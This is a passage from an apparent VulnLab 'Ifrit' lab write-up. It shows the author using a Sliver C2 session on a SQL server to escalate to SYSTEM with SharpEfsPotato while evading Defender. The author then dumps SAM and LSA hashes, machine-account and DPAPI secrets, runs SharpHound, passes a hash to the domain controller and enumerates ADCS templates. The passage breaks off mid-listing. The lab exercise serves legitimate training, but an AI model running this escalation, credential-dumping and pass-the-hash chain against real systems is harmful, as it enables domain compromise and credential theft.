Privilege escalation - SeImpersonatePrivilege abusing (SQL07$) (Ifrit_Shortcut)

Exploiting this is relatively simple, as we can impersonate SYSTEM and authenticate to an evil named pipe that we create.

We can direct this named pipe to a binary to execute, which will run in the context of SYSTEM.

In the past and until now, the easiest way was to utilize the Potato Family of exploits to impersonate and spawn this named pipe, but most of them are detected by Defender.

And Defender is present on this server:

[server] sliver (MEAN_PRIZE) > ps

 Pid    Ppid   Owner                    Arch     Executable                  Session 
====== ====== ======================== ======== =========================== =========
 0      0                                        [System Process]            -1      
 4      0                                        System                      -1      
...    
 4944   3460                                     conhost.exe                 -1      
 4340   676                                      svchost.exe                 -1      
 4752   3652                                     MicrosoftEdgeUpdate.exe     -1      
 4344   676                                      msdtc.exe                   -1      
 4872   676    NT Service\MSSQLSERVER   x86_64   sqlservr.exe                0       
 3916   676                                      sqlceip.exe                 -1      
 3864   800                                      MoUsoCoreWorker.exe         -1      
 6212   6016   NT Service\MSSQLSERVER   x86_64   svchost.exe                 0       
...      


⚠️  Security Product(s): Sysmon64, Windows Defender

Luckily enough since we currently have a session through an obfuscated payload that isn’t detected by Defender, we can execute these binaries through a .NET assembly that shouldn’t allow them to be detected from Defender’s behavioral detection. We compile and use SharpEfsPotato.

Now we can use Sliver’s built-in execute-assembly command to execute these binaries through a .NET assembly. This prevents us from needing to drop the binaries locally on the compromised machine.

We upload it then we exploit it in one quick step:

[server] sliver (MEAN_PRIZE) > upload stager.exe c:\\programdata\\1\\stg.exe

[*] Wrote file to c:\programdata\1\stg.exe

[server] sliver (MEAN_PRIZE) > execute-assembly SharpEfsPotato.exe '-p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "C:\programdata\1\stg.exe"'

[*] Output:
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/917c25f6-a5af-4dc3-a8a2-12bb55984692/\917c25f6-a5af-4dc3-a8a2-12bb55984692\917c25f6-a5af-4dc3-a8a2-12bb55984692
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

We got a new callback then jump to the new session:

[*] Session f44c6067 MEAN_PRIZE - 172.16.41.251:61501 (SQL07) - windows/amd64 - Thu, 05 Sep 2024 19:42:02 JST

[server] sliver (MEAN_PRIZE) > use f44c6067-e66c-47ee-b24a-94f8382f73ff

[*] Active session MEAN_PRIZE (f44c6067-e66c-47ee-b24a-94f8382f73ff)

[server] sliver (MEAN_PRIZE) > sessions 

 ID         Transport   Remote Address        Hostname   Username                 Operating System   Health  
========== =========== ===================== ========== ======================== ================== =========
 515b724e   http(s)     172.16.41.40:55640    DEV05      EU-IFRIT\jack.smith      windows/amd64      [ALIVE] 
 a8dc8ab3   http(s)     172.16.41.251:50295   SQL07      NT Service\MSSQLSERVER   windows/amd64      [ALIVE] 
 f44c6067   http(s)     172.16.41.251:61501   SQL07      NT AUTHORITY\SYSTEM      windows/amd64      [ALIVE] 

We spawned a session as NT AUTHORITY\SYSTEM

But we have been catch:

{68BB33DA-2DE4-45F0-ACE3-032E1386BFBF}

’execute-assemblyspawns probablynotepad` with this spoofing technique & then injects to run the cmd…so we need to improve that too.

Now we get the 7th flag Ifrit_Shortcut:

[server] sliver (MEAN_PRIZE) > ls \\User\\Administrator\\Desktop

C:\Users\Administrator\Desktop (3 items, 2.6 KiB)
=================================================
-rw-rw-rw-  desktop.ini         282 B    Sat Jul 13 02:12:30 -0700 2024
-rw-rw-rw-  flag.txt            36 B     Sun Jul 14 06:06:02 -0700 2024
-rw-rw-rw-  Microsoft Edge.lnk  2.3 KiB  Sat Jul 13 09:47:21 -0700 2024


[server] sliver (MEAN_PRIZE) > cat \\Users\\Administrator\\Desktop\\flag.txt

VL{c9c559c13adbbe4d6c39520ea6ca69a0}

We dump all hash:

[server] sliver (MEAN_PRIZE) > sharpsecdump -t 900 '' -target=172.16.41.251

[*] sharpsecdump output:
[*] RemoteRegistry service started on 172.16.41.251
[*] Parsing SAM hive on 172.16.41.251
[*] Parsing SECURITY hive on 172.16.41.251
[*] Sucessfully cleaned up on 172.16.41.251
---------------Results from 172.16.41.251---------------
[*] SAM hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a47d4c7819c0e397d7f6b9c86cfd1895
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b71162f2ac5b78ddaffc54238dca4867
[*] Cached domain logon information(domain/username:hash)
[*] LSA Secrets
[*] $MACHINE.ACC
it-ifrit.vl\SQL07$:aad3b435b51404eeaad3b435b51404ee:f44427ad274bb6da32ace52c576e7716
[*] DPAPI_SYSTEM
dpapi_machinekey:3be48e81e6ef745644ed57e11b4b4f1ea0436652
dpapi_userkey:811d3073680810ac33873c06cf1175796a7b26f9
[*] NL$KM
NL$KM:b2d433b494b80c10543cea42aee3ebed4a6a52b6e82f7152f69a02e89588ba958b9eb3376047a05e92ddb01853f6ecb220c77f3fb4e6b6a605f68c4c0944b7bd
---------------Script execution completed---------------

BloundHound (it-ifrit.vl)

[server] sliver (MEAN_PRIZE) > execute-assembly -i -s /home/himitsu/Downloads/VULNLAB/Ifrit/SharpHound-v2.5.6/SharpHound.exe -- -c all,gpolocalgroup -d it-ifrit.vl

[*] Output:
2024-09-05T18:55:27.9617235-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-09-05T18:55:28.9337990-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-09-05T18:55:29.0286030-07:00|INFORMATION|Initializing SharpHound at 6:55 PM on 9/5/2024
2024-09-05T18:55:29.8757242-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-09-05T18:55:30.0828337-07:00|INFORMATION|Beginning LDAP search for it-ifrit.vl
2024-09-05T18:55:30.2864134-07:00|INFORMATION|Beginning LDAP search for it-ifrit.vl Configuration NC
2024-09-05T18:55:30.4115860-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-09-05T18:55:30.4183858-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-09-05T18:55:32.9272482-07:00|INFORMATION|Consumers finished, closing output channel
2024-09-05T18:55:33.1464585-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-09-05T18:55:33.4136139-07:00|INFORMATION|Status: 351 objects finished (+351 117)/s -- Using 123 MB RAM
2024-09-05T18:55:33.4136139-07:00|INFORMATION|Enumeration finished in 00:00:03.3542635
2024-09-05T18:55:33.6342283-07:00|INFORMATION|Saving cache with stats: 17 ID to type mappings.
 1 name to SID mappings.
 3 machine sid mappings.
 4 sid to domain mappings.
 0 global catalog mappings.
2024-09-05T18:55:33.6818916-07:00|INFORMATION|SharpHound Enumeration Completed at 6:55 PM on 9/5/2024! Happy Graphing!

[*] Output saved to /tmp/execute-assembly_SQL07_202409060155373153442539.log

[server] sliver (MEAN_PRIZE) > ls

C:\ProgramData\1 (3 items, 51.6 KiB)
====================================
-rw-rw-rw-  20240905185532_BloodHound.zip                         35.5 KiB  Thu Sep 05 18:55:33 -0700 2024
-rw-rw-rw-  stg.exe                                               14.5 KiB  Thu Sep 05 03:41:33 -0700 2024
-rw-rw-rw-  YmU5M2E1MDQtNGQwNC00ZDRmLThiNjAtMmRlNzkzNWZiNzNm.bin  1.6 KiB   Thu Sep 05 18:55:33 -0700 2024


[server] sliver (MEAN_PRIZE) > download -t 900 20240905185532_BloodHound.zip

[*] Wrote 36334 bytes (1 file successfully, 0 files unsuccessfully) to /home/himitsu/Downloads/VULNLAB/Ifrit/20240905185532_BloodHound.zip

[server] sliver (MEAN_PRIZE) > rm 20240905185532_BloodHound.zip 

[*] C:\ProgramData\1\20240905185532_BloodHound.zip

[server] sliver (MEAN_PRIZE) > rm YmU5M2E1MDQtNGQwNC00ZDRmLThiNjAtMmRlNzkzNWZiNzNm.bin

[*] C:\ProgramData\1\YmU5M2E1MDQtNGQwNC00ZDRmLThiNjAtMmRlNzkzNWZiNzNm.bin

Domain computers:

image

Found 2 new hosts then check if we can find the IP address:

[server] sliver (MEAN_PRIZE) > sa-nslookup fs01.it-ifrit.vl 172.16.41.17 1

[*] Successfully executed sa-nslookup (coff-loader)
[*] Got output:
Query for domain name failed
DNS name does not exist.
[server] sliver (MEAN_PRIZE) > sa-nslookup fs02.it.ifrit.vl 172.16.41.17 1

[*] Successfully executed sa-nslookup (coff-loader)
[*] Got output:
A fs02.it-ifrit.vl 172.16.41.210
  • Add fs02.it-ifrit.vl in /etc/hosts
  • Add sudo ip route add 172.16.41.210/32 dev ligolo to access it via our Ligolo-ng tunnel

Found an interesting group VDI-ADMINS:

image

This user is also member of ADMINS:

image

So maybe this user has some specific privileges to all VDI.

We found also some escalation privilege paths:

image

The computer FS02.IT-IFRIT.VL has the privileges to perform the ADCS ESC1 attack against the target domain IT-IFRIT.VL.

ADCS ESC8 exploiting (FS02$)

We got the Machine account hash of SQL07$ then we double check if we can authenticate to DC07:

$ nxc smb dc07.it-ifrit.vl -u 'SQL07$' -H 'f44427ad274bb6da32ace52c576e7716'
SMB         172.16.41.17    445    DC07             [*] Windows Server 2022 Build 20348 x64 (name:DC07) (domain:it-ifrit.vl) (signing:True) (SMBv1:False)
SMB         172.16.41.17    445    DC07             [+] it-ifrit.vl\SQL07$:f44427ad274bb6da32ace52c576e7716

Confirmed

Check if this DC is also an ADCS server:

$ curl -k https://dc07.it-ifrit.vl/certsrv
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;} 
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} 
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
 </fieldset></div>
</div>
</body>
</html>

Confirmed DC07 is an ADCS server

Find all certificates:

[server] sliver (MEAN_PRIZE) > certify -- find -u 'SQL07$' --hashes ':f44427ad274bb6da32ace52c576e7716' -target it-ifrit.vl -dc-ip 172.16.41.17

[*] certify output:

   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ '__| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.1.0                               

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=it-ifrit,DC=vl'

[*] Listing info about the Enterprise CA 'it-ifrit-CA'

    Enterprise CA Name            : it-ifrit-CA
    DNS Hostname                  : DC07.it-ifrit.vl
    FullName                      : DC07.it-ifrit.vl\it-ifrit-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=it-ifrit-CA, DC=it-ifrit, DC=vl
    Cert Thumbprint               : 397DB9404F872A30ADE866CDDE2B5622DDB3FBD3
    Cert Serial                   : 6937EF87166E5A8246DB924ADE654400
    Cert Start Date               : 7/14/2024 2:55:36 AM
    Cert End Date                 : 9/4/2524 7:14:48 PM
    Cert Chain                    : CN=it-ifrit-CA,DC=it-ifrit,DC=vl
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
      Allow  ManageCA, ManageCertificates               IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
    Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : User
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Domain Users         S-1-5-21-2679633274-2572298512-61362222-513
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : EFS
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Encrypting File System
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Domain Users         S-1-5-21-2679633274-2572298512-61362222-513
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : Administrator
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : EFSRecovery
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : File Recovery
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : Machine
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Domain Computers     S-1-5-21-2679633274-2572298512-61362222-515
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : DomainController
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Domain Controllers   S-1-5-21-2679633274-2572298512-61362222-516
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
                                      IT-IFRIT\Enterprise Read-only Domain ControllersS-1-5-21-2679633274-2572298512-61362222-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : WebServer
    Schema Version                        : 1
    Validity Period                       : 2 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : SubCA
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : <null>
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : DomainControllerAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication, Smart Card Logon
    mspki-certificate-application-policy  : Client Authentication, Server Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Domain Controllers   S-1-5-21-2679633274-2572298512-61362222-516
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
                                      IT-IFRIT\Enterprise Read-only Domain ControllersS-1-5-21-2679633274-2572298512-61362222-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : DirectoryEmailReplication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Directory Service Email Replication
    mspki-certificate-application-policy  : Directory Service Email Replication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Domain Controllers   S-1-5-21-2679633274-2572298512-61362222-516
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
                                      IT-IFRIT\Enterprise Read-only Domain ControllersS-1-5-21-2679633274-2572298512-61362222-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteOwner Principals       : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteDacl Principals        : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519
        WriteProperty Principals    : IT-IFRIT\Domain Admins        S-1-5-21-2679633274-2572298512-61362222-512
                                      IT-IFRIT\Enterprise Admins    S-1-5-21-2679633274-2572298512-61362222-519

    CA Name                               : DC07.it-ifrit.vl\it-ifrit-CA
    Template Name                         : KerberosAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
